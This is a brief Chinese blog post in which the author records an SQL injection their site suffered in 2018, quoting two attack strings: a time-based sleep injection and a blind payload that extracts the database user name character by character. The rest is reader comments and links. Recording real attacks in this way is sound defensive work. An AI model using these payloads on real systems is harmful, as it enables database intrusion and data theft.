一次被 SQL注入的教训

博主： Karp
发布时间：2019 年 11 月 04 日
3505 次浏览
暂无评论
361 字数
分类：踩坑教训

18年6月发生的 SQL注入

SELECT COUNT(*) AS `numrows` FROM `table` WHERE `id` = ''+(select*from(select(sleep(20)))a)+''   

'|(SELECT 'CGKq' FROM DUAL WHERE 2651=2651 AND 5914 = IF((ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),4,1))>48),SLEEP(4),5914))||'

记录一下长点教训

最后修改：2019 年 11 月 04 日 11 : 13 PM

发表评论取消回复

评论 *

私密评论

名称 *

邮箱 *

地址

zhao
你好，我最近项目也出现了swServer_master_onA...
e0aKmeeTeam
该评论仅登录用户及评论双方可见
白秋白
楼主这个克隆不到。。
测试
请问如何删除呢~
planck
博主大大，请教一下为何你的页面滚动如此顺滑，我尝试过 bod...

一次被 SQL注入的教训

发表评论取消回复

腾讯云 Centos 安装 PHP 开发环境

数字货币现货平台评测

PHP7 Mongo 第三方类的使用及demo

收藏 PHP 计算器

Cannot assign requested address 踩坑及解决方案

PHP 还原科学计数法

Mysql group_concat 使用及坑位

Mysql 字段权限禁止修改数据表的某一字段

用protobuf编译时报错：protoc: error while loading shared libraries: libprotoc.so.9: cannot open shared object file: No such file or directory 的解决方法

【转】nginx基本配置与参数说明

发表评论 取消回复

发表评论取消回复